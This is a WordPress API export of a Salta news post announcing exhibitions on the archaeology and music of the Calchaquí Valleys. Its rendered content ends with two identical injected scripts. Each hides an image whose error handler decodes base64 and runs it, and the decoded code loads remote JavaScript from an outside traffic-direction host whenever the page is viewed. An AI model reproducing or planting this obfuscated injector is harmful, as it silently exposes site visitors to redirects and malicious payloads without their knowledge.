{"id":4127,"date":"2024-06-24T11:36:09","date_gmt":"2024-06-24T14:36:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4127"},"modified":"2025-08-13T23:53:58","modified_gmt":"2025-08-14T02:53:58","slug":"obras-de-artistas-saltenos-se-presentan-en-la-usina-cultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4127","title":{"rendered":"Obras de artistas salte\u00f1os se presentan en la Usina Cultural"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-e759b389d2bd4189ffa6dc96f91f8a23\" style=\"background-color:#95092c\"><em>Ma\u00f1ana martes 25 de junio, a las 18:30, en Juramento 180, se realizar\u00e1 la puesta en escena de \u00abLa M\u00fasica del Valle Calchaqu\u00ed de Salta\u00bb y \u201cArqueolog\u00eda del Valle Calchaqu\u00ed\u201d, de Arturo Botelli y Christian Vitry, respectivamente.<\/em><\/h4>\n\n\n\n<p>Ma\u00f1ana&nbsp;martes 25 de junio, se presentar\u00e1n, en la&nbsp;<strong>Usina Cultural<\/strong>, las obras \u201cArqueolog\u00eda del Valle Calchaqu\u00ed\u201d y \u00abLa M\u00fasica del Valle Calchaqu\u00ed de Salta\u00bb, relacionadas con el patrimonio arqueol\u00f3gico e intangible que yace en los Valles Calchaqu\u00edes.<\/p>\n\n\n\n<p>Desde las 18:30, con entrada libre y gratuita, los asistentes podr\u00e1n visitar los trabajos del arque\u00f3logo y catedr\u00e1tico, Christian Vitry y el &nbsp;m\u00fasico e investigador, Arturo Borelli, respectivamente.&nbsp;<\/p>\n\n\n\n<p>El evento se lleva adelante, en el marco del proyecto Memorial del Valle dirigido por Teuco Castilla y se destaca por la complejidad y la riqueza que expresan de esta regi\u00f3n, tanto desde una perspectiva arqueol\u00f3gica como musical, revelando un legado que contin\u00faa siendo una fuente de inspiraci\u00f3n y estudio.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/obras-de-artistas-saltenios-se-presentan-en-la-usina-cultural-96299\">Secretar\u00eda de Prensa<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana martes 25 de junio, a las 18:30, en Juramento 180, se realizar\u00e1 la puesta en escena de \u00abLa M\u00fasica del Valle Calchaqu\u00ed de Salta\u00bb y \u201cArqueolog\u00eda del Valle Calchaqu\u00ed\u201d, de Arturo Botelli y Christian Vitry, respectivamente. Ma\u00f1ana&nbsp;martes 25 de junio, se presentar\u00e1n, en la&nbsp;Usina Cultural, las obras \u201cArqueolog\u00eda del Valle Calchaqu\u00ed\u201d y \u00abLa M\u00fasica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4127","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4127"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4127"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4127\/revisions"}],"predecessor-version":[{"id":6758,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4127\/revisions\/6758"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4128"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}